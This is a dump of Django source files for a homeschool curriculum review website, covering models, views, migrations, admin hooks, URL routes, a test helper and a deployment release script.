super().get_context_data(**kwargs)\n context[\"curriculum\"] = get_object_or_404(\n Curriculum, slug=self.kwargs.get(\"slug\")\n )\n return context\n\n\nclass ReviewCreateView(LoginRequiredMixin, SuccessMessageMixin, generic.CreateView):\n form_class = ReviewForm\n template_name = \"reviews/create.html\"\n success_message = \"Your review has been submitted\"\n\n def get_success_url(self):\n return reverse(\"curriculums:detail\", kwargs={\"slug\": self.kwargs.get(\"slug\")})\n\n def form_valid(self, form):\n form.instance.curriculum = get_object_or_404(\n Curriculum, slug=self.kwargs.get(\"slug\")\n )\n form.instance.user = self.request.user\n return super().form_valid(form)\n\n def render_to_response(self, context, **response_kwargs):\n slug = self.kwargs.get(\"slug\")\n curriculum = get_object_or_404(Curriculum, slug=slug)\n context[\"curriculum\"] = curriculum\n review = (\n curriculum.reviews.filter(user__id=self.request.user.id).first() or None\n )\n # Redirect user to update review if one exists\n if review:\n return redirect(\n \"curriculums:reviews:update\", slug=curriculum.slug, uuid=review.uuid\n )\n return super().render_to_response(context, **response_kwargs)\n\n\nclass ReviewUpdateView(LoginRequiredMixin, SuccessMessageMixin, generic.UpdateView):\n form_class = ReviewForm\n template_name = \"reviews/create.html\"\n success_message = \"Your review has been updated\"\n\n def get_success_url(self):\n return reverse(\"curriculums:detail\", kwargs={\"slug\": self.kwargs.get(\"slug\")})\n\n def get_object(self, queryset=None):\n return get_object_or_404(Review, uuid=self.kwargs.get(\"uuid\"))\n\n def render_to_response(self, context, **response_kwargs):\n # Prevent editing review by another user\n if self.request.user != self.object.user:\n return redirect(\"curriculums:detail\", slug=self.kwargs.get(\"slug\"))\n context[\"curriculum\"] = get_object_or_404(\n Curriculum, slug=self.kwargs.get(\"slug\")\n )\n return super().render_to_response(context, **response_kwargs)\n"
},
{
"alpha_fraction": 0.7564767003059387,
"alphanum_fraction": 0.7564767003059387,
"avg_line_length": 26.571428298950195,
"blob_id": "79087fef761947c60324989c6be2275f4e1d1e25",
"content_id": "1db7377289478dab62a51fb6fb753ca1e5e54f1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 193,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 7,
"path": "/fphs/curriculums/apps.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass CurriculumsConfig(AppConfig):\n name = \"fphs.curriculums\"\n verbose_name = _(\"Curriculums\")\n"
},
{
"alpha_fraction": 0.6718202829360962,
"alphanum_fraction": 0.6756126284599304,
"avg_line_length": 31.037384033203125,
"blob_id": "8536b7d2ddccee8a33e7be26a22cf0de2ab4e5ea",
"content_id": "e657fd9ed4984973f31dd79daeed33287df09228",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3428,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 107,
"path": "/fphs/users/views.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib import messages\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Avg\nfrom django.db.models.functions import Coalesce\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.urls import reverse\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.generic import ListView, DetailView, RedirectView, UpdateView\nfrom fphs.curriculums.models import Review\nfrom .forms import UserProfileForm, UserPrivacyForm\n\nUser = get_user_model()\n\n\nclass UserRedirectView(LoginRequiredMixin, RedirectView):\n permanent = False\n\n def get_redirect_url(self):\n return reverse(\"users:profile\", kwargs={\"username\": self.request.user.username})\n\n\nclass UserFavoritesView(ListView):\n template_name = \"users/user_favorites_list.html\"\n paginate_by = 10\n\n def get_queryset(self):\n return (\n self.request.user.favorite_curriculums.annotate(\n avg_rating=Coalesce(Avg(\"reviews__rating\"), 0.0)\n )\n .all()\n .order_by(\"-favoritecurriculum__created\")\n )\n\n\nclass UserProfileView(DetailView):\n model = User\n slug_field = \"username\"\n slug_url_kwarg = \"username\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"reviews\"] = Review.objects.filter(\n user__username=self.object.username\n ).order_by(\"-created\")[:3]\n return context\n\n\nclass UserProfileEditView(LoginRequiredMixin, UpdateView):\n form_class = UserProfileForm\n\n def get_object(self):\n return User.objects.get(username=self.request.user.username)\n\n def get_success_url(self):\n return reverse(\"users:profile-edit\")\n\n def form_valid(self, form):\n messages.add_message(\n self.request, messages.SUCCESS, _(\"Profile successfully updated\")\n )\n return super().form_valid(form)\n\n\nclass UserPrivacyView(LoginRequiredMixin, UpdateView):\n form_class = UserPrivacyForm\n\n def get_object(self):\n return User.objects.get(username=self.request.user.username)\n\n def get_success_url(self):\n return reverse(\"users:privacy\")\n\n def form_valid(self, form):\n messages.add_message(\n self.request, messages.SUCCESS, _(\"Settings successfully updated\")\n )\n return super().form_valid(form)\n\n\nclass UserReviewsListView(ListView):\n model = Review\n slug_field = \"username\"\n slug_url_kwarg = \"username\"\n template_name = \"users/user_reviews_list.html\"\n context_object_name = \"reviews\"\n paginate_by = 10\n user = None\n\n def setup(self, request, *args, **kwargs):\n self.user = get_object_or_404(User, username=kwargs.get(\"username\"))\n return super().setup(request, *args, **kwargs)\n\n def get_queryset(self):\n return Review.objects.filter(user_id=self.user.id)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"user\"] = self.user\n return context\n\n def get(self, request, *args, **kwargs):\n # Redirect to user's profile if public reviews are disabled and accessed by a different user\n if not self.user.public_reviews and self.user != request.user:\n return redirect(\"users:profile\", username=self.user)\n return super().get(request, *args, **kwargs)\n"
},
{
"alpha_fraction": 0.5258620977401733,
"alphanum_fraction": 0.5793103575706482,
"avg_line_length": 24.217391967773438,
"blob_id": "66914ba13fa61972c3056f9b726890ae785d9b3f",
"content_id": "a97d91d7a262f1726bcf2cddbfcf9f42aebf7aaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 23,
"path": "/fphs/curriculums/migrations/0006_auto_20200104_0004.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-01-04 00:04\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0005_auto_20200103_2354\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"curriculum\",\n name=\"publisher\",\n field=models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE,\n related_name=\"curriculums\",\n to=\"curriculums.Publisher\",\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7068965435028076,
"alphanum_fraction": 0.7137930989265442,
"avg_line_length": 31.22222137451172,
"blob_id": "12afa2cc1809c4a343d5f1a758f02fc65a5f540c",
"content_id": "5a0410d104cec0d517c82895c8e2adcae8376dac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 18,
"path": "/fphs/users/migrations/0006_create_through_relation_favorites.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import get_user_model\nfrom django.db import migrations\n\ndef create_through_relations(apps, schema_editor):\n User = get_user_model()\n FavoriteCurriculum = apps.get_model('users', 'FavoriteCurriculum')\n for user in User.objects.all():\n for curriculum in user.favorite_curriculums.all():\n FavoriteCurriculum(user=user, curriculum=curriculum).save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0005_favoritecurriculum'),\n ]\n\n operations = [migrations.RunPython(create_through_relations)]\n"
},
{
"alpha_fraction": 0.5975610017776489,
"alphanum_fraction": 0.6060975790023804,
"avg_line_length": 27.275861740112305,
"blob_id": "dfb2e498d4539cab91f226fb50cc98f129fa099c",
"content_id": "0038baf4f82b54e6e501d27a788a0b5dd3a63231",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 820,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 29,
"path": "/fphs/curriculums/migrations/0014_review_uuid.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.db import migrations, models\nimport uuid\n\ndef generate_uuid(apps, schema_editor):\n Review = apps.get_model(\"curriculums\", \"Review\")\n for review in Review.objects.all():\n review.uuid = uuid.uuid4()\n review.save(update_fields=[\"uuid\"])\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0013_curriculum_slug\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"review\",\n name=\"uuid\",\n field=models.UUIDField(default=uuid.uuid4, editable=False, null=True),\n ),\n migrations.RunPython(generate_uuid),\n migrations.AlterField(\n model_name=\"review\",\n name=\"uuid\",\n field=models.UUIDField(default=uuid.uuid4, editable=False, unique=True),\n )\n ]\n"
},
{
"alpha_fraction": 0.7179962992668152,
"alphanum_fraction": 0.72541743516922,
"avg_line_length": 25.950000762939453,
"blob_id": "f3fda15a86efaf833441ae5fa708bdcad3b3ba6f",
"content_id": "f77978a9b4cf8502f8ceb9c9ce3b029e23526621",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 20,
"path": "/fphs/users/migrations/0010_create_superuser.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from config.settings.base import ADMIN_EMAIL, ADMIN_USERNAME, ADMIN_PASSWORD\nfrom django.contrib.auth import get_user_model\nfrom django.db import migrations\n\n\ndef create_superuser(apps, schema_editor):\n superuser = get_user_model().objects.create_superuser(\n email=ADMIN_EMAIL, username=ADMIN_USERNAME, password=ADMIN_PASSWORD\n )\n\n superuser.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"users\", \"0009_remove_user_occupation\"),\n ]\n\n operations = [migrations.RunPython(create_superuser)]\n"
},
{
"alpha_fraction": 0.5663385987281799,
"alphanum_fraction": 0.5771653652191162,
"avg_line_length": 25.45833396911621,
"blob_id": "e197fcb1063b38013335a63b2b69f85dad23e0af",
"content_id": "6cd0b9b3c712b475ee6af8d29477fe1c64794fb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5080,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 192,
"path": "/fphs/curriculums/models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.conf import settings\nfrom django.db import models\nfrom django.forms import ModelForm, TextInput, Textarea, Select\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\nimport uuid\n\n\nclass Category(models.Model):\n class Meta:\n verbose_name = \"Category\"\n verbose_name_plural = \"Categories\"\n\n name = models.CharField(max_length=50)\n\n def __str__(self):\n return self.name\n\n\nclass Subject(models.Model):\n name = models.CharField(max_length=50)\n category = models.ForeignKey(\n Category,\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name=\"subjects\",\n )\n\n def __str__(self):\n return self.name\n\n\nclass Grade(models.Model):\n name = models.CharField(max_length=20)\n\n def __str__(self):\n return self.name\n\n\nclass Age(models.Model):\n name = models.CharField(max_length=3)\n\n def __str__(self):\n return self.name\n\n\nclass ReligiousPreference(models.Model):\n name = models.CharField(max_length=30)\n\n def __str__(self):\n return self.name\n\n\nclass Publisher(models.Model):\n name = models.CharField(max_length=100)\n link = models.URLField(max_length=200)\n\n def __str__(self):\n return self.name\n\n\nclass Sort:\n class Labels(models.IntegerChoices):\n NEWEST = (\n 1,\n _(\"Newest\"),\n )\n OLDEST = (\n 2,\n _(\"Oldest\"),\n )\n HIGHEST_RATING = (\n 3,\n _(\"Highest Rating\"),\n )\n LOWEST_RATING = (\n 4,\n _(\"Lowest Rating\"),\n )\n NAME = (\n 5,\n _(\"A-Z\"),\n )\n NAME_REVERSED = 6, _(\"Z-A\")\n\n class Values(models.IntegerChoices):\n NEWEST = (\n 1,\n \"-created\",\n )\n OLDEST = (\n 2,\n \"created\",\n )\n HIGHEST_RATING = (\n 3,\n \"-avg_rating\",\n )\n LOWEST_RATING = (\n 4,\n \"avg_rating\",\n )\n NAME = (\n 5,\n \"name\",\n )\n NAME_REVERSED = 6, \"-name\"\n\n\nclass Curriculum(models.Model):\n name = models.CharField(max_length=200)\n description = models.TextField(max_length=2000)\n slug = models.SlugField(max_length=200, unique=True)\n link = models.URLField(max_length=200)\n image = models.ForeignKey(\n \"wagtailimages.Image\", null=True, blank=True, on_delete=models.SET_NULL\n )\n is_confirmed = models.BooleanField(default=False)\n subjects = models.ManyToManyField(Subject, related_name=\"curriculums\")\n grades = models.ManyToManyField(Grade, related_name=\"curriculums\")\n ages = models.ManyToManyField(Age, related_name=\"curriculums\")\n religious_preference = models.ForeignKey(\n ReligiousPreference,\n null=True,\n on_delete=models.SET_NULL,\n related_name=\"curriculums\",\n )\n publisher = models.ForeignKey(\n Publisher, on_delete=models.CASCADE, related_name=\"curriculums\"\n )\n created_by = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n null=True,\n on_delete=models.SET_NULL,\n related_name=\"curriculums\",\n )\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse(\"curriculums:detail\", kwargs={\"slug\": self.slug})\n\n\nclass CurriculumForm(ModelForm):\n class Meta:\n model = Curriculum\n fields = [\"name\", \"description\", \"link\", \"publisher\"]\n widgets = {\n \"name\": TextInput(attrs={\"class\": \"form-control\"}),\n \"description\": Textarea(attrs={\"class\": \"form-control\"}),\n \"link\": TextInput(attrs={\"class\": \"form-control\"}),\n \"publisher\": Select(attrs={\"class\": \"form-control\"}),\n }\n\n\nclass Review(models.Model):\n RATING_CHOICES = ((1, \"1\"), (2, \"2\"), (3, \"3\"), (4, \"4\"), (5, \"5\"))\n uuid = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)\n curriculum = models.ForeignKey(\n Curriculum, on_delete=models.CASCADE, related_name=\"reviews\"\n )\n content = models.TextField(max_length=5000, blank=True)\n rating = models.IntegerField(choices=RATING_CHOICES)\n verified = models.BooleanField(default=False)\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name=\"reviews\"\n )\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n class Meta:\n ordering = [\"-updated\"]\n\n def __str__(self):\n return f\"{self.curriculum} - {self.rating} - {self.user.email}\"\n\n\nclass ReviewForm(ModelForm):\n class Meta:\n model = Review\n fields = [\"content\", \"rating\"]\n labels = {\n \"content\": _(\"Review\"),\n }\n widgets = {\n \"content\": Textarea(attrs={\"class\": \"form-control\"}),\n \"rating\": Select(attrs={\"class\": \"form-control\"}),\n }\n"
},
{
"alpha_fraction": 0.5423387289047241,
"alphanum_fraction": 0.6129032373428345,
"avg_line_length": 25.105262756347656,
"blob_id": "acb334c827eba27639d2899256d6ed6f335c6d8e",
"content_id": "67f14ac798d170e051da5bafc5cfe810170b0ef8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 496,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 19,
"path": "/fphs/users/migrations/0003_user_favorite_curriculums.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-27 16:16\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('curriculums', '0011_auto_20200529_0234'),\n ('users', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='favorite_curriculums',\n field=models.ManyToManyField(blank=True, related_name='favorited_by', to='curriculums.Curriculum'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6836638450622559,
"alphanum_fraction": 0.6836638450622559,
"avg_line_length": 28.41666603088379,
"blob_id": "f345db0cb329a27bb097b08962c1482e31e626c3",
"content_id": "8d5de0c1590abec9b1cd1fb5635aa8bb0b58e1c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1059,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 36,
"path": "/fphs/curriculums/tests/test_utils.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import get_user_model\n\nfrom fphs.curriculums.models import (\n Category,\n Subject,\n Grade,\n Age,\n ReligiousPreference,\n Publisher,\n Curriculum,\n)\n\n\ndef create_curriculum(name):\n category = Category.objects.create(name=name)\n subject = Subject.objects.create(name=name, category=category)\n grade = Grade.objects.create(name=name)\n age = Age.objects.create(name=name)\n religious_preference = ReligiousPreference.objects.create(name=name)\n publisher = Publisher.objects.create(name=name)\n user = get_user_model().objects.create_user(\n email=\"[email protected]\", username=f\"username{name}\", password=f\"password{name}\"\n )\n user.save()\n curriculum = Curriculum.objects.create(\n name=name,\n description=\"description\",\n link=\"http://localhost\",\n religious_preference=religious_preference,\n publisher=publisher,\n created_by=user,\n )\n curriculum.subjects.add(subject)\n curriculum.grades.add(grade)\n curriculum.ages.add(age)\n return curriculum\n"
},
{
"alpha_fraction": 0.5981981754302979,
"alphanum_fraction": 0.6396396160125732,
"avg_line_length": 28.210525512695312,
"blob_id": "681bbd7068754f25f512b3b05157ab18b93cf2b9",
"content_id": "4acff26f2b5760ab75da83fc4330fa5876f93061",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 555,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 19,
"path": "/fphs/users/migrations/0008_user_favorite_curriculums.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-30 23:47\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('curriculums', '0012_curriculum_image'),\n ('users', '0007_remove_user_favorite_curriculums'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='favorite_curriculums',\n field=models.ManyToManyField(blank=True, related_name='favorited_by', through='users.FavoriteCurriculum', to='curriculums.Curriculum'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6129032373428345,
"alphanum_fraction": 0.6244239807128906,
"avg_line_length": 28.931034088134766,
"blob_id": "1590b0aad6e371280b739e287ceb1e2531af455c",
"content_id": "709679140347c5abc9a2aa5ffb5c72f01fd85c05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 868,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 29,
"path": "/fphs/curriculums/migrations/0013_curriculum_slug.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.db import migrations, models\nfrom django.utils.text import slugify\n\ndef generate_slug(apps, schema_editor):\n Curriculum = apps.get_model(\"curriculums\", \"Curriculum\")\n for curriculum in Curriculum.objects.all():\n curriculum.slug = slugify(curriculum.name)\n curriculum.save(update_fields=[\"slug\"])\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0012_curriculum_image\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"slug\",\n field=models.SlugField(max_length=200, db_index=False, null=True),\n ),\n migrations.RunPython(generate_slug),\n migrations.AlterField(\n model_name=\"curriculum\",\n name=\"slug\",\n field=models.SlugField(max_length=200, unique=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6960926055908203,
"alphanum_fraction": 0.6960926055908203,
"avg_line_length": 33.54999923706055,
"blob_id": "12b095a097dd25f81e146eeb45494491c3cbdd64",
"content_id": "d998b92291c926314a713bd648e6f2bffde4dee6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 691,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 20,
"path": "/fphs/users/urls.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.urls import path\n\nfrom fphs.users.views import (\n UserRedirectView,\n UserFavoritesView,\n UserProfileEditView,\n UserPrivacyView,\n UserProfileView,\n UserReviewsListView,\n)\n\napp_name = \"users\"\nurlpatterns = [\n path(\"~redirect/\", view=UserRedirectView.as_view(), name=\"redirect\"),\n path(\"favorites/\", UserFavoritesView.as_view(), name=\"favorites\"),\n path(\"profile/edit/\", UserProfileEditView.as_view(), name=\"profile-edit\"),\n path(\"privacy/\", UserPrivacyView.as_view(), name=\"privacy\"),\n path(\"<str:username>/profile/\", UserProfileView.as_view(), name=\"profile\"),\n path(\"<str:username>/reviews/\", UserReviewsListView.as_view(), name=\"reviews\"),\n]\n"
},
{
"alpha_fraction": 0.7424242496490479,
"alphanum_fraction": 0.7424242496490479,
"avg_line_length": 17,
"blob_id": "e155e2f22a25ca42bc406f01fb56e0e9c0ab02c4",
"content_id": "5d28ea04837968613a39e7ede7941a187707c6b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/compose/production/django/release",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -o errexit\nset -o pipefail\nset -o nounset\n\necho 'Collecting static files...'\npython manage.py collectstatic --noinput --clear\n\necho 'Running migrations...'\npython manage.py migrate\n"
},
{
"alpha_fraction": 0.5905362963676453,
"alphanum_fraction": 0.5905362963676453,
"avg_line_length": 15.861701965332031,
"blob_id": "852df3d5a7d0df3a7039bdb40cb9c4f896bdf6aa",
"content_id": "e0d040f9d5ab4ad9d1043cce2dbfd302a932a141",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1585,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 94,
"path": "/fphs/curriculums/wagtail_hooks.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from wagtail.contrib.modeladmin.options import (\n ModelAdmin,\n ModelAdminGroup,\n modeladmin_register,\n)\n\nfrom .models import (\n Curriculum,\n Category,\n Subject,\n Grade,\n Age,\n ReligiousPreference,\n Publisher,\n Review,\n)\n\n\nclass CategoryAdmin(ModelAdmin):\n model = Category\n\n\nclass SubjectAdmin(ModelAdmin):\n model = Subject\n\n\nclass GradeAdmin(ModelAdmin):\n model = Grade\n\n\nclass AgeAdmin(ModelAdmin):\n model = Age\n\n\nclass ReligiousPreferenceAdmin(ModelAdmin):\n model = ReligiousPreference\n\n\nclass PublisherAdmin(ModelAdmin):\n model = Publisher\n list_display = (\n \"name\",\n \"link\",\n )\n search_fields = (\"name\",)\n\n\nclass CurriculumAdmin(ModelAdmin):\n model = Curriculum\n list_display = (\n \"name\",\n \"is_confirmed\",\n \"created_by\",\n )\n list_filter = (\n \"is_confirmed\",\n \"subjects__category\",\n \"subjects\",\n \"grades\",\n \"ages\",\n )\n search_fields = (\n \"name\",\n \"created_by__username\",\n )\n\n\nclass ReviewAdmin(ModelAdmin):\n model = Review\n list_display = (\n \"content\",\n \"rating\",\n \"verified\",\n \"user\",\n )\n list_filter = (\"verified\",)\n search_fields = (\"user__username\",)\n\n\nclass HomeschoolGroup(ModelAdminGroup):\n menu_label = \"Homeschool\"\n items = (\n CategoryAdmin,\n SubjectAdmin,\n GradeAdmin,\n AgeAdmin,\n ReligiousPreferenceAdmin,\n PublisherAdmin,\n CurriculumAdmin,\n ReviewAdmin,\n )\n\n\nmodeladmin_register(HomeschoolGroup)\n"
}
] | 49 |
monorainny/diablo_webservice
|
https://github.com/monorainny/diablo_webservice
|
141447cf9cff7eb4b62b87a07e247537812e60ba
|
d5fa2e07e7274677bb627b966b7e1c34a4931cad
|
0cc39e7d8f98bfa3ba8138c9b966d60961a655ae
|
refs/heads/master
| 2020-05-17T01:50:35.295501 | 2015-10-02T07:24:15 | 2015-10-02T07:24:15 | 21,782,883 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6282690167427063,
"alphanum_fraction": 0.6400996446609497,
"avg_line_length": 23.34848403930664,
"blob_id": "4f5e4215645e1ae280fb0362939ec146e9e43bb5",
"content_id": "6f47f54a47b6f5ca2c245885af490c0177332e35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1606,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 66,
"path": "/src/DiabloProfile.py",
"repo_name": "monorainny/diablo_webservice",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, url_for, json, request\nimport urllib2\n\nurl = 'http://www.acme.com/products/3322'\nhost = 'http://kr.battle.net'\n\napp = Flask(__name__)\n\n'''\nconnection = pymongo.Connection('localhost', 27017)\ntodos = connection['demo']['todos']\n\ndef json_load(data):\n #return json.loads(data, object_hook=json_util.object_hook)\n\ndef json_dump(data):\n return json.dumps(data, default=json_util.default)\n'''\n\[email protected]('/')\ndef hello_world():\n return render_template('diablo3.html')\n\[email protected]('/user/<string:id>')\ndef search_user(id):\n profileApi = '/api/d3/profile/'\n battleTag = id.replace('#', '-')\n \n servieUrl = host + profileApi + battleTag + \"/\"\n response = urllib2.urlopen(servieUrl).read()\n \n return response\n #return json_dump(list(todos.find()))\n\[email protected]('/hero/<string:id>')\ndef search_hero(id):\n profileApi = '/api/d3/profile/'\n battleTag = id.replace('#', '-')\n battleTag = battleTag.replace('@', '/')\n \n servieUrl = host + profileApi + battleTag\n response = urllib2.urlopen(servieUrl).read()\n \n return response\n\n'''\[email protected]('/todos', methods=['POST'])\ndef new_todo():\n todo = json_load(request.data)\n todos.save(todo)\n return json_dump(todo)\n\[email protected]('/todos/<todo_id>', methods=['PUT'])\ndef update_todo(todo_id):\n todo = json_load(request.data)\n todos.save(todo)\n return json_dump(todo)\n\[email protected]('/todos/<todo_id>', methods=['DELETE'])\ndef delete_todo(todo_id):\n todos.remove(ObjectId(todo_id))\n return \"\"\n'''\n\nif __name__ == '__main__':\n app.run(debug=True,port=8080)"
},
{
"alpha_fraction": 0.5301339030265808,
"alphanum_fraction": 0.531622052192688,
"avg_line_length": 20.861787796020508,
"blob_id": "65cca3bd338478e5ddcff1a3d4d6a1177de3f7a8",
"content_id": "a51f98e5ee7a50c0040942ca3ab8bd6256d9fa95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2688,
"license_type": "no_license",
"max_line_length": 178,
"num_lines": 123,
"path": "/src/static/diablo3.js",
"repo_name": "monorainny/diablo_webservice",
"src_encoding": "UTF-8",
"text": "$(function() {\n\twindow.Hero = Backbone.Model.extend({\n\t\turlRoot: '/hero'\n\t});\n\t\n\twindow.User = Backbone.Model.extend({\n\t\turlRoot: '/user'\n\t});\n\t\n\twindow.HeroView = Backbone.View.extend({\n\t\tel: $(\".hero-view\"),\n\t\t\n\t\trender: function () {\n\t\t\tvar that = this;\n\t\t\tthat.hero = new Hero({id: this.model});\n\n\t\t\tthat.hero.fetch({\n\t\t\t\tsuccess: function(heros) {\n\t\t\t\t\tvar attr = heros.attributes;\n\t\t\t\t\t\n\t\t\t\t\tvar stats = attr.stats;\n\t\t\t\t\tvar skills = attr.skills;\n\t\t\t\t\tvar items = attr.items;\n\t\t\t\t\tvar followers = attr.followers;\n\t\t\t\t\t\n\t\t\t\t\t//console.log(stats);\n\t\t\t\t\t//console.log(items);\n\t\t\t\t\tconsole.log(skills);\n\t\t\t\t\t//console.log(followers);\n\t\t\t\t\t\n\t\t\t\t\tvar template = _.template($('#hero-template').html(), {hero: attr});\n\t\t\t\t\t\n\t\t\t\t\t$(\"#hero-view\").html(template);\n\t\t\t\t},\n\t\t\t\terror: function() {\n\t\t\t\t\t$(\"#hero-view\").html(\"\");\n\t\t\t\t\t\n\t\t\t\t\tconsole.log(\"fetch failed\");\n\t\t\t\t}\n\t\t\t})\n\t\t},\n\t});\n\t\n\twindow.HeroListView = Backbone.View.extend({\n\t\tel: $(\"#diablo3app\"),\n\t\t\n\t\trender: function () {\n\t\t\tvar that = this;\n\t\t\tthat.user = new User({id: this.model});\n\n\t\t\tthat.user.fetch({\n\t\t\t\tsuccess: function(userId) {\n\t\t\t\t\tvar attr = userId.attributes;\n\t\t\t\t\t\n\t\t\t\t\tvar errorCode = attr.code;\n\t\t\t\t\t\n\t\t\t\t\tif (errorCode == null)\n\t\t\t\t\t{\n\t\t\t\t\t\tvar battleTag = attr.battleTag;\n\t\t\t\t\t\tvar paragonLevel = attr.paragonLevel;\n\t\t\t\t\t\tvar heroes = attr.heroes;\n\t\t\t\t\t\t\n\t\t\t\t\t\tvar contents = '';\n\t\t\t\t\t\t\n\t\t\t\t\t\t$.each(heroes, function(index, value) { \n\t\t\t\t\t\t\tcontents += \"<li><button type='button' class='btn btn-danger show' id='\" + value.id + \"'>\" + value.name + \"(\" + value.class + \")\" + \" - \" + value.level + 